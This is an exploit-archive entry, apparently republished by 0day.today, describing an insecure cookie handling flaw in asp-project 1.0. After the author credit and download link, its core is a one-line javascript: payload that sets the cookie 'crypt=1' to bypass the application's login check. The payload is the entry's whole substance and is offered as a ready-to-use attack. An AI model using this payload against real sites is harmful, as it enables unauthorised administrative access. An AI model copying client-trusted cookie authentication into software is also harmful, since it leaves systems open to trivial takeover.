id: 4720
date: 01/22/2009
title: asp-project 1.0 Insecure Cookie Method Vulnerability
author: IRCRASH
cves: 

====================================================
asp-project 1.0 Insecure Cookie Method Vulnerability
====================================================


#####################################################################################
####                        Asp-project Cookie Handling                          ####
#####################################################################################
#AUTHOR : Sina Yazdanmehr (R3d.W0rm)                                                #
#####################################################################################
#                                                                                   #
#Download : http://www.sourceforge.net/projects/asp-project                         #
#                                                                                   #
#Dork : :(                                                                          #
#                                                                                   #
#####################################################################################
#                                      [Bug]                                        #
#                                                                                   #
#javascript:document.cookie = "crypt=1; path=/";                                    #
#                                                                                   #
#####################################################################################


#  0day.today [2023-03-26]  #